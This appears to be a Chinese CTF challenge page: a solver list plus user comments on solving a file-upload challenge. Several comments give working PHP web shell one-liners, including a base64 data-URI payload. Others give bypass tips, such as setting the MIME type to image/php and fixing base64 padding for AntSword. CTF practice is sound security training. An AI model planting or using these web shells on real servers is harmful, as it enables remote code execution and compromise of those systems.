评分(10)
解题动态
a1451753998 攻破了该题 1天前
zhuizhui 攻破了该题 1天前
dwx1583 攻破了该题 2天前
hackerbugku 攻破了该题 3天前
qidianzhi 攻破了该题 4天前
Future92 攻破了该题 6天前
lzq2000 攻破了该题 10天前
网络安全亮 攻破了该题 11天前
ETERNALBLUE 攻破了该题 13天前
李欣 攻破了该题 14天前
nihaolmb 攻破了该题 16天前
yafoolaw 攻破了该题 16天前
124要留就要77 攻破了该题 18天前
18039739141 攻破了该题 18天前
ZZZZZZYx 攻破了该题 18天前
奔跑小马 攻破了该题 19天前
puppyo0o0 攻破了该题 20天前
souljian03 攻破了该题 21天前
wpc1027 攻破了该题 22天前
评论
zhuizhui 1天前
举报
在post body构造一句话木马 image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg== url 解码后即为 image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==
llc123 2月前
举报
thinkphp v5.1.35 lts和xss不知道有没有操作空间
LoadOverload 2月前
举报
用webacoo亦可解决
Zhumeng 7月前
举报
注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php
zhuohao 8月前
举报
蚁剑一直返回数据为空 一直连不上
hackhui 7月前
举报
一句话木马传参加''
LLTVLL 9月前
举报
一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题
BlueL1ght 1年前
举报
<?php echo `$_POST[a]`;?>
Daniel2023 1年前
举报
<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=
vchopin 1年前
举报
base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上
lzq2000 10天前
举报
大家都知道base64编码是按顺序每三个字符一组进行编码,正常情况下对“;?>”进行base64编码得到的就是“Oz8+”,我们可以调整“;”前面的字符长度,让“;”不与“?>”分在一组编码即可!另外我估计把加号进行url编码应该也可以,我没测试。
lzq2000 10天前
举报
不是最后结尾要为“=”,而是结尾不能为“+”,因为“+”会被认为是空格,不参与base64解码,所以解码后会少个大于号“>”,运行这个php时会报错!!!而且一般情况下base64编码后大概率后面会出现“+”
XRain 1年前
举报
实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。